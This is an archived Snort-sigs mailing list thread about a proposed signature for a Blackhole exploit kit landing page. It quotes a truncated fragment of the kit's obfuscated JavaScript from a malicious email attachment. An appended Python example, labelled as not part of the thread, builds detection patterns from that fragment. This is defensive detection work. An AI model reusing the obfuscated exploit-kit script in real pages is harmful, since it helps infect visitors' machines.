Snort mailing list archives

Re: Proposed Signature - "COMMUNITY SPECIFIC-THREATS High Probability Blackhole Landing with catch qq"


From: Matt Olney <molney () sourcefire com>
Date: Thu, 1 Mar 2012 09:45:47 -0500

Nathan, got an email entitled:

Fwd: Your Flight N 91-17249698
It had an attached html file with the following html (recognize it? :))

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "
http://www.w3.org/TR/html4/loose.dtd";>
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  *<title>Please wait untill the page loads...</title>*
 </head>
 <body>
<h1>Please Wait... Loading... </h1><br>
 </body>`

<script>if(window['doc'+'ume'+'nt'])aa=/\w/.exec(1).index+[];aaa='0';try{new
locat*ion();}catch(qqq){ss*=String;if(aa

Etc...

Good rule :)

Matt

On Wed, Feb 29, 2012 at 4:35 PM, Community Signatures
<lists () packetmail net> wrote:

On 02/29/12 15:19, Matt Olney wrote:
Since you're associating with an exploit kit, rather than an active
trojan, and given that exploits are typically aimed at user
applications, I'd use classtype:attempted-user;

Understood, on the ET side we tend to use trojan-activity because the
point of the exploit kit is to install a trojan/malware.  I always
viewed attempted-user as privilege escalation.  I may just leave
classtype off and let VRT apply this and the metadata as they feel fit.

Because it is a file, and you're not using any http_inspect buffers,
we'd use $FILE_DATA_PORTS in case it is delivered via mail (saw one like
that yesterday).

Thanks Matt, can you elaborate more on this as I've not seen this
behavior before, where Blackhole is delivered via mail.  I have seen
mailing campaigns that include a link which, upon landing, is Blackhole.
I don't disagree with your changes over $HTTP_PORTS, but I have not seen
this behavior, especially with SMTPDs.

Again, primarily cosmetic changes, and does nothing, in this simple
case, to modify the functionality of the rule.

Thank you for taking the time to explain the changes and current
convention.

Thanks,
Nathan
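Added example, not code from this thread or from Snort: a small Python check for the delivery path Matt describes, the Blackhole landing page arriving as an HTML mail attachment rather than over HTTP, keyed on the strings visible in the sample above. The marker names, addresses and message contents are constructed for illustration.

```python
import email
import email.policy
import re
from email.message import EmailMessage

# Strings from the landing page quoted in this thread; the last two are the
# obfuscation fragments the "catch qq" rule name refers to.
LANDING_MARKERS = {
    "wait_title": re.compile(r"Please wait untill the page loads", re.I),
    "split_document": re.compile(r"window\['doc'\+'ume'\+'nt'\]"),
    "catch_qqq": re.compile(r"catch\(qqq\)\{ss=String"),
}

def match_markers(html: bytes) -> list:
    """Names of the landing-page markers found in one HTML blob."""
    text = html.decode("utf-8", errors="replace")
    return [name for name, rx in LANDING_MARKERS.items() if rx.search(text)]

def scan_message(raw: bytes) -> list:
    """(filename, markers) for every HTML attachment that looks like the landing page."""
    msg = email.message_from_bytes(raw, policy=email.policy.default)
    hits = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        if part.get_content_disposition() != "attachment":
            continue  # inline HTML bodies are not the case the thread describes
        found = match_markers(part.get_payload(decode=True))
        if found:
            hits.append((part.get_filename(), found))
    return hits

def build_sample(malicious: bool = True) -> bytes:
    """Constructed test message modelled on the 'Your Flight' mail; not a real capture."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "recipient@example.invalid"
    msg["Subject"] = "Fwd: Your Flight N 91-17249698"
    msg.set_content("Your ticket is attached.")
    if malicious:
        html = ("<html><head><title>Please wait untill the page loads...</title></head>"
                "<body><h1>Please Wait... Loading... </h1></body>"
                "<script>if(window['doc'+'ume'+'nt'])aa=/\\w/.exec(1).index+[];"
                "try{new location();}catch(qqq){ss=String;}</script></html>")
    else:
        html = "<html><head><title>Itinerary</title></head><body>Flight details</body></html>"
    msg.add_attachment(html, subtype="html", filename="ticket.html")
    return msg.as_bytes()

if __name__ == "__main__":
    print(scan_message(build_sample()))
```

The same marker check would miss the page when it is fetched over HTTP, which is why the thread settles on `$FILE_DATA_PORTS` rather than `$HTTP_PORTS` alone.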


_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!
